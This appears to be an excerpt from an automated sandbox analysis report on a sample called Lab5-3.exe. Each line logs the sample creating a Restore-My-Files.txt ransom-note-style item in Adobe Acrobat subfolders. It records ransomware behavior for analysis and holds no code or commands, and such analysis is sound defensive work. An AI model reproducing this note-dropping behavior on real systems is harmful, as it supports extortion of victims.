                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\en-us\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\ja-jp\Restore-My-Files.txtJump to behavior
